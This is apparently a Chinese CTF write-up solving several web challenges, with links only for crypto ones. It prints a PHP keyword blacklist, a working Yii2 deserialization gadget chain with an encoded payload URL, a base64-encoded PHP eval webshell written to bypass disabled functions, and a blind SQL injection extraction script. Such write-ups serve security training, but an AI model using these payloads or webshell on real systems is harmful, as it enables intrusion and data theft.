[MISC]签到

http://www.longpelaexpertise.com.au/toolsCode.php

image-20210509102244837

[WEB]find it

robots.txt

.1ndexx.php.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}

#logo {
margin-bottom: 40px;
}
<yle>
</head>
<body>
< img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
<ml>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

直接写入phpinfo:

1
http://eci-2zeab1jn4vnk02hulykm.cloudeci1.ichunqiu.com/1ndexx.php?code=<?php phpinfo();?>

然后访问hack.php:

1
http://eci-2zeab1jn4vnk02hulykm.cloudeci1.ichunqiu.com/hack.php

PHPINFO页面 找到flag

[WEB]framework

存在WWW.ZIP源码泄露

https://www.anquanke.com/post/id/217930

三条链子都可以用。看下phpinfo:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;

public function __construct(){
$this->checkAccess = 'assert';
$this->id = "phpinfo();";
}
}
}

namespace Faker{
use yii\rest\CreateAction;

class Generator{
protected $formatters;

public function __construct(){
// 这里需要改为isRunning
$this->formatters['render'] = [new CreateAction(), 'run'];
}
}
}

namespace phpDocumentor\Reflection\DocBlock\Tags{

use Faker\Generator;

class See{
protected $description;
public function __construct()
{
$this->description = new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
class Swift_KeyCache_DiskKeyCache{
private $keys = [];
private $path;
public function __construct()
{
$this->path = new See;
$this->keys = array(
"axin"=>array("is"=>"handsome")
);
}
}
// 生成poc
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
1
http://eci-2ze8j3xqhbs4r48k0oky.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyNzoiU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlIjoyOntzOjMzOiIAU3dpZnRfS2V5Q2FjaGVfRGlza0tleUNhY2hlAGtleXMiO2E6MTp7czo0OiJheGluIjthOjE6e3M6MjoiaXMiO3M6ODoiaGFuZHNvbWUiO319czozMzoiAFN3aWZ0X0tleUNhY2hlX0Rpc2tLZXlDYWNoZQBwYXRoIjtPOjQyOiJwaHBEb2N1bWVudG9yXFJlZmxlY3Rpb25cRG9jQmxvY2tcVGFnc1xTZWUiOjE6e3M6MTQ6IgAqAGRlc2NyaXB0aW9uIjtPOjE1OiJGYWtlclxHZW5lcmF0b3IiOjE6e3M6MTM6IgAqAGZvcm1hdHRlcnMiO2E6MTp7czo2OiJyZW5kZXIiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjEwOiJwaHBpbmZvKCk7Ijt9aToxO3M6MzoicnVuIjt9fX19fQ==

可以看phpinfo 关键是绕过:

1
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,mail,putenv,error_log,error_reporting,unset,unlink,return	

参考:https://www.anquanke.com/post/id/170681

写shell绕过:

1
2
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("v.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1Rbdl0pOz8+"));';}

蚁剑连接:绕过disable functions

image-20210509154116325

[WEB]WebsiteManger

登陆页面,图片存在注入,注入得到用户名、密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
req = requests.session()
string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

res = ''
for i in range(21,50):
for j in string:
url = "http://eci-2zeebn8ci69dx3qyic2l.cloudeci1.ichunqiu.com/image.php?id="
payload = "if(ascii(substr((select/**/group_concat(password)from(users)),%d,1))=(%s),1,0)"%(i,ord(j))
r = req.get(url+payload)
if "JFIF" in r.text:
res += j
print(res)
break
#admin
#05b0176855ad7f3e7d9ac

登陆后 file协议读取flag即可

1
file:///flag

image-20210509142022116

[WEB]ezlight

0day– gml yyds

[Crypto]primegame

http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/

[Crypto]hpcurve

https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup